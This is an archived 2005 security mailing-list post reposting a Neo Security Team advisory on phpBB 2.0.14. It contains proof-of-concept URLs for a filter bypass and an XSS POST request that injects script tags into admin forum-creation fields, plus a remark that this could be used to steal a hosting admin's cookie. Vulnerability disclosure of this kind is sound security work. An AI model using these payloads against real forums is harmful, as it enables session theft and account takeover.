Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

-==phpBB 2.0.14 Multiple Vulnerabilities==-

from [HaCkZaTaN] Network Security [Permanent Link]
Subject: -==phpBB 2.0.14 Multiple Vulnerabilities==-
Date: 23 Apr 2005 22:43:45 -0000 


/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST]. - Advisory #14 - 17/04/05
--------------------------------------------------------
Program:  phpBB 2.0.14
Homepage:  http://www.phpbb.com
Vulnerable Versions: phpBB 2.0.14 & Lower versions
Risk: Low Risk!!
Impact: Multiple Vulnerabilities.

       -==phpBB 2.0.14 Multiple Vulnerabilities==-
---------------------------------------------------------

- Description
---------------------------------------------------------
phpBB is a high powered, fully scalable, and highly customizable
Open Source bulletin board package. phpBB has a user-friendly
interface, simple and straightforward administration panel, and
helpful FAQ. Based on the powerful PHP server language and your
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,
phpBB is the ideal free community solution for all web sites.

- Tested
---------------------------------------------------------
localhost & many forums

- Explotation
---------------------------------------------------------
          -==Bad Filter of HTML Code==-
phpBB2/profile.php?mode=viewprofile&u=\[]\
phpBB2/viewtopic.php?p=3&highlight=\[]\
#########################################################
                     -==XSS==-
POST /admin/admin_forums.php?sid=7bd54a5a9861ef180af78897e70 HTTP/1.1
forumname=&lt;script&gt;alert('NST')&lt;/script&gt;&forumdesc=&lt;script&gt;alert('NST')&lt;/script&gt;&c=1&forumstatus=0&prune_days=7&prune_freq=1&mode=createforum&f=&submit=Create
 new forum

Some people cannot find it interest someones yes but well i dont care because 
if you put some effort you know that
you can do a lot with this, like fooling the Admin of the Hosting to get his 
cookie & and then get access to whm...

- References
--------------------------------------------------------
http://neosecurityteam.net/Advisories/Advisory-14.txt


- Credits
-------------------------------------------------
Discovered by HaCkZaTaN <hck_zatan@hotmail.com>

[N]eo [S]ecurity [T]eam [NST]. - http://neosecurityteam.net/

Got Questions? http://neosecurityteam.net/

Irc.gigachat.net #uruguay [NeoSecurity IRC]

- Greets
--------------------------------------------------------
           Paisterist
           Daemon21
           LINUX
           erg0t
           uyx
           CrashCool
           Makoki
           KingMetal
           r3v3ng4ns

           And my Colombian people

        @@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
        '@@@@@''@@'@@@''''''''@@''@@@''@@
        '@@'@@@@@@''@@@@@@@@@'''''@@@
        '@@'''@@@@'''''''''@@@''''@@@
        @@@@''''@@'@@@@@@@@@@''''@@@@@
*/

/* EOF */
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  New auto download / install / exploit URL?, Gandalf The White
Next by Date:  artmedic_links5 remote file access exploit, Adam n30n Simuntis
Previous by Thread:  New auto download / install / exploit URL?, Gandalf The White
Next by Thread:  [Full-disclosure] Re: -==phpBB 2.0.14 Multiple Vulnerabilities==-, Paul Laudanski
Indexes:  [Date] [Thread] [Top] [All Lists]